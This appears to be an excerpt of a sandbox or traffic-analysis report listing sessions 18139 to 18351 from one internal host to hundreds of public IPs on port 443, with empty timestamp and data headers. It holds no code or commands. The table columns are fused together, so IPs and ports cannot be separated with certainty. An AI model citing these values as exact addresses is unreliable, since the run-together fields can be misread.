                                                  18139192.168.2.1344148142.161.120.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18140192.168.2.134187099.88.47.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18141192.168.2.135801292.139.8.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18142192.168.2.133884279.191.52.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18143192.168.2.1337946107.164.168.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18144192.168.2.1347632221.248.92.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18145192.168.2.1351920222.110.137.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18146192.168.2.1340534196.10.129.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18147192.168.2.133666432.63.216.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18148192.168.2.1348942106.223.218.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18149192.168.2.1341622108.173.71.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18150192.168.2.1351420132.80.148.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18151192.168.2.135797664.234.192.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18152192.168.2.134086818.204.213.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18153192.168.2.135519281.215.140.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18154192.168.2.1343650163.212.19.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18155192.168.2.1359726128.118.203.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18156192.168.2.135139031.213.246.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18157192.168.2.1343750149.117.242.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18158192.168.2.1341802132.90.249.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18159192.168.2.1338664124.158.226.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18160192.168.2.1344950143.151.236.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18161192.168.2.135269247.64.230.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18162192.168.2.1358412102.8.237.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18163192.168.2.1347742135.220.49.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18164192.168.2.1353056115.94.242.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18165192.168.2.1345620157.163.108.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18166192.168.2.1343268178.162.30.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18167192.168.2.1360560180.9.119.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18168192.168.2.1360644109.6.213.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18169192.168.2.1341794125.23.35.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18170192.168.2.1350232174.243.27.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18171192.168.2.133692044.156.102.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18172192.168.2.1340536161.200.62.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18173192.168.2.1340562219.218.233.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18174192.168.2.134347665.117.177.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18175192.168.2.134256072.9.69.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18176192.168.2.1351066123.62.12.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18177192.168.2.1360548125.111.86.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18178192.168.2.133832091.203.54.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18179192.168.2.1334364124.226.242.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18180192.168.2.134366462.28.84.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18181192.168.2.1337144128.70.142.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18182192.168.2.1347932212.218.62.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18183192.168.2.1335132210.29.194.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18184192.168.2.13501162.82.205.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18185192.168.2.134539218.118.90.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18186192.168.2.1336500179.83.203.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18187192.168.2.1337616132.145.178.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18188192.168.2.1343948147.108.1.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18189192.168.2.1349398142.246.105.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18190192.168.2.133768869.60.226.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18191192.168.2.134347895.166.150.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192192.168.2.1359516177.90.12.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18193192.168.2.134064491.84.228.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18194192.168.2.135376436.231.147.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18195192.168.2.1339356162.25.21.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18196192.168.2.1334824116.105.147.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18197192.168.2.1345064192.215.191.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18198192.168.2.135039897.218.98.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18199192.168.2.133563488.149.242.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18200192.168.2.1334480147.23.113.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18201192.168.2.1333274165.172.97.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18202192.168.2.1339354117.173.47.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18203192.168.2.133631290.235.13.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18204192.168.2.1349526165.119.51.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18205192.168.2.1340990191.73.244.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18206192.168.2.13508188.94.27.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18207192.168.2.133820418.102.21.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18208192.168.2.133288287.182.35.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18209192.168.2.1346314219.59.252.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18210192.168.2.1345650114.243.34.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18211192.168.2.135622069.251.113.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18212192.168.2.1357172168.53.98.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18213192.168.2.134501860.110.253.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18214192.168.2.133502058.245.88.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18215192.168.2.135409032.159.252.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18216192.168.2.1359534136.119.7.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18217192.168.2.1340638131.153.219.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18218192.168.2.1357332160.188.206.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18219192.168.2.1347038219.136.30.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18220192.168.2.135859080.95.60.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18221192.168.2.133523425.210.114.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18222192.168.2.133467419.138.88.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18223192.168.2.1350898115.63.73.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18224192.168.2.1341146197.207.251.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18225192.168.2.1358748111.206.157.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18226192.168.2.13535005.65.167.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18227192.168.2.135105894.103.229.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18228192.168.2.1332902124.181.68.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18229192.168.2.1333868223.13.132.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18230192.168.2.1341722217.149.99.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18231192.168.2.1345864170.144.105.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18232192.168.2.1352294167.240.145.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18233192.168.2.1352632200.119.71.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18234192.168.2.1342194209.23.137.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18235192.168.2.136068066.93.174.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18236192.168.2.1336262105.225.215.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18237192.168.2.133654824.168.233.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18238192.168.2.1351306174.138.236.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18239192.168.2.1350462168.93.114.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18240192.168.2.134210069.40.203.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18241192.168.2.1346698185.166.167.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18242192.168.2.134923074.240.233.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18243192.168.2.133813062.152.36.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18244192.168.2.1359390219.161.243.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18245192.168.2.135981878.125.185.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18246192.168.2.133628665.27.59.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18247192.168.2.1345350183.208.240.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18248192.168.2.1352884131.58.182.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18249192.168.2.134410457.213.204.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18250192.168.2.1348348221.189.42.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18251192.168.2.1342984184.40.232.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18252192.168.2.13401164.71.220.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18253192.168.2.134554620.154.174.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18254192.168.2.1350346134.45.106.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18255192.168.2.1333890188.98.7.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18256192.168.2.133635618.35.200.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18257192.168.2.1333792174.30.179.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18258192.168.2.1353676178.227.230.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18259192.168.2.134838068.127.124.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18260192.168.2.1350070162.25.12.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18261192.168.2.134062031.210.91.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18262192.168.2.1356624188.193.152.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18263192.168.2.1351520109.211.59.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18264192.168.2.135444871.202.35.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18265192.168.2.1338328165.109.76.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18266192.168.2.1352152130.23.107.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18267192.168.2.1348564191.87.248.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18268192.168.2.133948699.219.217.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18269192.168.2.135174831.7.230.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18270192.168.2.1333352213.40.171.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18271192.168.2.1351818140.249.115.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18272192.168.2.1343790147.54.134.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18273192.168.2.1345358134.155.162.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18274192.168.2.1338214223.217.76.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18275192.168.2.1355522158.53.98.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18276192.168.2.1342700197.14.167.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18277192.168.2.135524667.0.172.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18278192.168.2.1338016152.11.119.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18279192.168.2.1353672176.15.20.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18280192.168.2.1360468180.233.115.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18281192.168.2.135353250.252.107.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18282192.168.2.134526837.189.21.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18283192.168.2.134926624.237.85.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18284192.168.2.13405149.238.5.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18285192.168.2.134210095.98.2.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18286192.168.2.1351712184.85.43.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18287192.168.2.1353158130.73.168.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18288192.168.2.135038275.59.1.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18289192.168.2.134858074.77.13.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18290192.168.2.1358836134.45.201.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18291192.168.2.1335140142.124.217.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18292192.168.2.1351762198.59.5.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18293192.168.2.1351198119.28.155.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18294192.168.2.1360104103.15.99.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18295192.168.2.1354256165.113.189.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18296192.168.2.134282260.164.230.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18297192.168.2.1357952191.3.196.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18298192.168.2.1335974219.210.46.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18299192.168.2.1340658195.39.1.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18300192.168.2.1351858221.110.196.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18301192.168.2.133342895.131.201.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18302192.168.2.133336451.50.210.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18303192.168.2.1337284122.6.23.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18304192.168.2.1337932144.112.164.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18305192.168.2.133325298.225.31.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18306192.168.2.133584076.229.1.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18307192.168.2.134302451.95.90.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18308192.168.2.135588861.216.27.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18309192.168.2.135459696.245.154.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18310192.168.2.135084450.74.52.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18311192.168.2.135939614.220.140.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18312192.168.2.134148692.27.91.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18313192.168.2.135680249.153.63.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18314192.168.2.1351498120.58.99.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18315192.168.2.135679463.4.120.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18316192.168.2.134944491.84.213.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18317192.168.2.1356116219.79.122.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18318192.168.2.133805031.103.126.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18319192.168.2.135729473.71.168.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18320192.168.2.134875091.6.7.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18321192.168.2.1343332125.221.77.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18322192.168.2.1332978204.15.134.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18323192.168.2.133744818.202.135.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18324192.168.2.1348204136.119.192.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18325192.168.2.134419491.48.30.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18326192.168.2.1359590217.82.232.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18327192.168.2.134165061.189.253.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18328192.168.2.135720037.12.207.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18329192.168.2.1356976223.116.136.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18330192.168.2.1337764167.30.31.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18331192.168.2.1342892196.17.225.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18332192.168.2.1335898173.36.69.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18333192.168.2.1334820192.26.128.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18334192.168.2.1335326193.95.145.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18335192.168.2.135920814.159.127.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18336192.168.2.1341608179.64.220.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18337192.168.2.135333879.0.182.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18338192.168.2.133768636.114.111.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18339192.168.2.1350460197.29.9.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18340192.168.2.133649849.245.188.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18341192.168.2.1358582152.206.84.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18342192.168.2.1334110222.88.190.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18343192.168.2.1352996110.186.93.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18344192.168.2.1353176139.252.19.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18345192.168.2.1349506113.103.118.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18346192.168.2.1343438156.65.139.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18347192.168.2.1356622160.173.178.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18348192.168.2.1359028191.90.225.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18349192.168.2.1342954139.148.255.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18350192.168.2.133639038.153.40.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18351192.168.2.133801041.86.62.231443
